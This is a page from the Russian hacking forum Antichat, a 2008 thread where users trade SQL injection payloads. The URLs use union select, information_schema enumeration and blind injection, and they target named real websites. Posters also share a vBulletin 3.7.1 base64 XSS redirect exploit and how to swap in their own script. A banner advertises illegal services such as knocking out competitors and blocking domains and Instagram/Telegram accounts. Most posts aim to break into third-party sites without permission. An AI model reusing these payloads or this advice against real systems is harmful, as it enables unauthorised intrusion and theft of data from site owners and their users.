Ваши вопросы по уязвимостям.

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

Скрыть

		ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 293 из 2438

293

Опции темы

Поиск в этой теме

Опции просмотра

#2921

11.08.2008, 08:14

sabe

Постоянный

Регистрация: 16.03.2007

Сообщений: 380

С нами: 10081287

Репутация: 568

Отправить сообщение для sabe с помощью AIM

Отправить сообщение для sabe с помощью Yahoo

что тут можно зделать ?

Цитата:

http://interfilm.ru/takelogin.php?returnto=&username=admin&password=99 99999+union+select+1

и вот тут

Цитата:

http://www.photodom.com/ru/catalog.php?page=0&id=9999999)+union+select+1,2,3, 4,5,6,7,9,10/*

а также здесь знаю что юнион использовать нельзя.. но все же..

Цитата:

http://www.aldebaran.ru/gb/index.php?entry=25+union+all+select+1/*

netframework - хз как разкрутить..

Цитата:

http://zman.com/news/category.aspx?CategoryId=20'

SVAROG

Цитата:

http://www.paintball.ru/next.php?id=99999+union+select+1,2,table_name+from +information_schema.tables+limit+17,1--

баян..

#2922

11.08.2008, 10:36

superboys

Познающий

Регистрация: 01.02.2008

Сообщений: 53

С нами: 9618766

Репутация: 5

http://evo.nightspirits.net/indexframe.php?razdel=news&comm=13'+and+1=2+union+ select+1,2,3,4,unhex(hex(concat(version(),database (),password(0),user()))),6,7,8,9/* кто знает как тут нарыть удалённый адрес для БД

#2923

11.08.2008, 10:58

Jokester

Познавший АНТИЧАТ

Регистрация: 18.02.2008

Сообщений: 1,136

С нами: 9593606

Репутация: 4915

2 sabe

http://interfilm.ru/takelogin.php
Пишет что нет коннекта с базой, что ты хочешь от него

Сдесь пятая ветка без вывода,подзапросы:
http://www.photodom.com/ru/catalog.php?page=0&id=9)+and+substring(version(),1 ,1)=5/*

Сдесь лимит после ордер влиять на запрос можно только подставляя 2-е значение лимита:
http://www.aldebaran.ru/gb/index.php?entry=25,1/*
тоесть никак

это ошибка введённых данных использовать можно только расскрытие пути
http://zman.com/news/category.aspx?CategoryId=20

#2924

11.08.2008, 12:08

nicusor

Участник форума

Регистрация: 19.03.2008

Сообщений: 108

С нами: 9550090

Репутация: 137

Цитата:

Сообщение от superboys

http://evo.nightspirits.net/indexframe.php?razdel=news&comm=-1'+and+1=2+union+select+1,2,3,4,aes_decrypt(aes_en crypt(concat_ws(0x3a,version(),database(),user()), 0x71),0x71),6,7,8,9/*

#2925

11.08.2008, 12:34

superboys

Познающий

Регистрация: 01.02.2008

Сообщений: 53

С нами: 9618766

Репутация: 5

сёравно @localhost

vbulletin 3.7.1

#2926

11.08.2008, 15:07

TehRn

Новичок

Регистрация: 08.07.2008

Сообщений: 5

С нами: 9390384

Репутация: 0

vbulletin 3.7.1

Цитата:

XSS-base64

_http://securityvulns.ru/news/CGI/2008.06.14.html
_http://securityvulns.ru/news/CGI/2008.06.19.html

Exploit: http://localhost/vB3/admincp/index.php?redirect=data:text/html;base64, PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K

http://localhost/vB3/modcp/index.php?redirect=data:text/html;base64, PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K

Помогите разобраться как использовать данную XSS заранее спс.

Последний раз редактировалось TehRn; 11.08.2008 в 15:13..

#2927

11.08.2008, 20:52

MaSTeR GэN

Участник форума

Регистрация: 23.05.2008

Сообщений: 121

С нами: 9457097

Репутация: 133

2TehRn собственно ф чем проблема то ?
"PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K" Это не что иное как закодированный base64 "<script>alert('XSS')</script>"

собтвенно кодируй то что нужно в base и вставляй это пассивная xss на форуме оч многа написанно по этой теме читай

#2928

11.08.2008, 20:53

mr.The

Познавший АНТИЧАТ

Регистрация: 30.04.2007

Сообщений: 1,205

С нами: 10016425

Репутация: 1257

Подобрал количество полей. всё гуд, ошибки нету, но и ничего не выводит. где трабл?

Цитата:

http://test.livani.lv/lat/aktualitates/aktualitates/?doc=55555551661+union+select+1,2,3,4,5,6,7,8,9,10 ,11,12,13,14/*

Последний раз редактировалось mr.The; 11.08.2008 в 21:04..

#2929

11.08.2008, 21:07

MaSTeR GэN

Участник форума

Регистрация: 23.05.2008

Сообщений: 121

С нами: 9457097

Репутация: 133

2mr.The если мне зрение не изменяет тама нету полей для вывода один выход слепая иньекция

#2930

11.08.2008, 21:24

mr.The

Познавший АНТИЧАТ

Регистрация: 30.04.2007

Сообщений: 1,205

С нами: 10016425

Репутация: 1257

2MaSTeR GэN
и на том спасибо. а я думал туплю где-т

Страница 293 из 2438

293

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Уязвимости CMS / форумов	26	15.02.2005 22:57

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход